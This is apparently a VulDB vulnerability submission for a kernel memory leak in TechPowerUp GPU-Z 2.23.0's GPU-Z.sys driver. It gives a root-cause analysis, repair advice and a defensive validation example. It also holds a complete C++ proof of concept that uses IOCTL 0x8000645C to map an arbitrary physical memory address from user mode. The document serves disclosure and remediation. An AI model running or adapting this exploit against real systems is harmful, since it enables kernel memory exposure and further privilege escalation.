Submission #580513: TechPowerUp GPU-Z 2.23.0 Information Exposure

Title: TechPowerUp GPU-Z 2.23.0 Information Exposure
Description:

An issue was discovered in GPU-Z.sys in TechPowerUp GPU-Z before 2.23.0, which is vulnerable to a Kernel Memory Leak vulnerability.

# NAME OF AFFECTED PRODUCT(S)

- GPU-Z

## Vendor Homepage

https://www.techpowerup.com/

# AFFECTED AND/OR FIXED VERSION(S)

2.23.0

## Submitter

- aiyakami

## Vulnerable File

- the 0x8000645C IOCTL code

## VERSION(S)

- 2.23.0

## Software Link

- https://www.techpowerup.com/gpuz/

# PROBLEM TYPE

## Vulnerability Type

- Kernel Memory Leak

## Root Cause

- The GPU-Z.sys driver in TechPowerUp GPU-Z 2.23.0 fails to properly sanitize or restrict access when handling the 0x8000645C IOCTL control code. This allows low-privileged users to trigger a kernel memory leak by sending crafted IOCTL requests, exposing sensitive kernel-space data.

## Impact

- Information Disclosure: Attackers can leak kernel memory contents, potentially exposing sensitive data such as pointers, credentials, or other system information.
- Kernel Address Space Layout Randomization (KASLR) Bypass: Memory leaks may reveal kernel memory layouts, aiding further exploitation (e.g., privilege escalation).
- System Stability Risks: Uncontrolled memory access might lead to crashes (Denial of Service).

# DESCRIPTION

- TechPowerUp GPU-Z 2.23.0 is vulnerable to a Kernel Memory Leak vulnerability by triggering the 0x8000645C IOCTL code of the GPU-Z.sys driver.

# Vulnerability details and POC

## Vulnerability location:

- **`0x8000645C IOCTL`**

## Payload:

Example: The attacker specifies an arbitrary physical memory address for mapping and obtains the resulting logical address after mapping to facilitate further exploitation.

```cpp
#include <Windows.h>
#include <stdio.h>
#include <tchar.h>
#include <string>
#include <iostream>

#define IOCTL_MAP_PHYSICAL_MEMORY CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL 0x8000645C
#define DEV_NAME _T("\\\\.\\GPU-Z")

// Input buffer layout expected by the 0x8000645C handler (packed, 12 bytes)
#pragma pack(push, 1)
typedef struct _MAP_RESULT {
    ULONGLONG PhysAddr;
    ULONG Length;
} MAP_RESULT;
#pragma pack(pop)

std::wstring GetLastErrorAsString(DWORD errorCode)
{
    LPWSTR buffer = nullptr;
    DWORD size = FormatMessageW(
        FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL, errorCode, MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
        (LPWSTR)&buffer, 0, NULL);
    if (buffer == nullptr)
        return L"(no description available)";
    std::wstring message(buffer, size);
    LocalFree(buffer);
    return message;
}

int main()
{
    HANDLE hDevice = CreateFileW(L"\\\\.\\GPU-Z", GENERIC_READ | GENERIC_WRITE, 0, NULL,
                                 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device: %lu\n", GetLastError());
        MessageBoxA(NULL, "Failed to open device", "tis", 0);
        return 1;
    }

    ULONG index = 0;            // output buffer: logical address returned by the driver
    DWORD returned = 0;
    MAP_RESULT result = { 0 };
    result.PhysAddr = 0xD0000000;   // physical address chosen by the caller
    result.Length = 0x1000;

    BOOL success = DeviceIoControl(hDevice, IOCTL, &result, sizeof(result),
                                   &index, sizeof(index), &returned, NULL);
    if (!success) {
        DWORD err = GetLastError();
        std::wcerr << L"DeviceIoControl failed. Details:\n"
                   << L"- Error Code: " << err << L"\n"
                   << L"- Description: " << GetLastErrorAsString(err) << L"\n"
                   << L"- IOCTL: 0x" << std::hex << IOCTL << std::dec << L"\n"
                   << L"- Input Size: " << sizeof(result) << L" bytes\n"
                   << L"- Output Size: " << returned << L" bytes returned\n";
        MessageBoxA(NULL, "DeviceIoControl failed", "tis", 0);
        CloseHandle(hDevice);
        return 1;
    }

    printf("Mapped Virtual Address: 0x%lx\n", index);
    MessageBoxA(NULL, "Mapped Virtual Address", "tis", 0);
    CloseHandle(hDevice);
    return 0;
}
```

## Below is the vulnerability analysis along with screenshots of specific information obtained during testing and runtime execution using the aforementioned code:

The 0x8000645C IOCTL invokes sub_140001880, where the parameters of the MmMapIoSpace function can be fully controlled by a user-mode process, leading to arbitrary physical memory address mapping.

![Image](https://github.com/user-attachments/assets/c555b7f6-bd6f-4e57-ace3-cc919074ffea)

After mapping the specified memory address, the 0x80006494 IOCTL can be used to read memory, though this functionality is not yet demonstrated in the current Proof of Concept (PoC).

![Image](https://github.com/user-attachments/assets/53796e66-6980-4d23-b5dd-fe0deaf530d5)

Relevant test files are located at: https://github.com/Aiyakami/CVE-1/tree/main/test1

![Image](https://github.com/user-attachments/assets/7f201d63-5fae-4638-996c-6630fbf537e8)

# Suggested repair

1. **Input Validation & Sanitization**: Implement strict validation of IOCTL control codes in the GPU-Z.sys driver.
2. **Address Space Isolation**: If physical memory mapping is required, validate address ranges and restrict mappings to non-sensitive regions.
3. **Privilege Enforcement**: Require elevated privileges (e.g., SeLockMemoryPrivilege) for critical IOCTL operations to prevent low-privileged exploitation.
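As an added illustration of the checks the suggested repair calls for (example code written for this page, not GPU-Z.sys code or the vendor's fix), the portable C below validates a mapping request of the same packed layout the PoC sends before anything is mapped: privilege, exact buffer size, a bounded length, no wrap of PhysAddr + Length, and containment in an allow-list. The ALLOWED window, MAX_MAP_LEN and the caller_is_admin flag are assumptions standing in for values a real driver would derive from its device and from the caller's token.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same packed layout the PoC above sends: 8-byte physical address, 4-byte length. */
#pragma pack(push, 1)
typedef struct _MAP_REQUEST {
    uint64_t PhysAddr;
    uint32_t Length;
} MAP_REQUEST;
#pragma pack(pop)

/* Assumed policy values: a driver would derive these from the device it owns. */
#define MAX_MAP_LEN 0x10000u
typedef struct { uint64_t base; uint64_t size; } PHYS_RANGE;
static const PHYS_RANGE ALLOWED[] = {
    { 0xFED00000ULL, 0x1000 },   /* placeholder MMIO window, not a real GPU-Z range */
};

enum map_status { MAP_OK = 0, MAP_ACCESS_DENIED, MAP_BAD_SIZE, MAP_OVERFLOW, MAP_NOT_ALLOWED };

/* caller_is_admin stands in for the token / requestor-mode check a real dispatch
   routine performs; it must never be derived from the request buffer itself. */
enum map_status validate_map_request(const void *buf, size_t buf_len, bool caller_is_admin)
{
    if (!caller_is_admin)                       /* privilege before parsing anything */
        return MAP_ACCESS_DENIED;
    if (buf == NULL || buf_len != sizeof(MAP_REQUEST))
        return MAP_BAD_SIZE;                    /* exact size: no short or oversized buffers */

    MAP_REQUEST req;
    memcpy(&req, buf, sizeof req);              /* copy out once; never re-read user memory */
    if (req.Length == 0 || req.Length > MAX_MAP_LEN)
        return MAP_BAD_SIZE;
    if (req.PhysAddr > UINT64_MAX - req.Length)
        return MAP_OVERFLOW;                    /* PhysAddr + Length must not wrap */

    uint64_t end = req.PhysAddr + req.Length;   /* exclusive end of the requested window */
    for (size_t i = 0; i < sizeof ALLOWED / sizeof ALLOWED[0]; i++) {
        if (req.PhysAddr >= ALLOWED[i].base && end <= ALLOWED[i].base + ALLOWED[i].size)
            return MAP_OK;                      /* wholly inside one allowed window */
    }
    return MAP_NOT_ALLOWED;                     /* arbitrary physical address: refuse */
}
```

Run against the PoC's own request (PhysAddr 0xD0000000, Length 0x1000) this returns MAP_NOT_ALLOWED, which is the decision the vulnerable handler never makes.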
Source: https://github.com/Aiyakami/CVE-1/issues/3
User: aiyakami (UID 85128)
Submitted: 2025. 05. 19. AM 09:02 (11 months ago)
Moderation: 2025. 05. 29. AM 10:27 (10 days later)
Status: Accepted
VulDB Entry: 310494 [TechPowerUp GPU-Z 2.23.0 0x8000645C IOCTL GPU-Z.sys sub_140001880 denial of service]
Points: 20
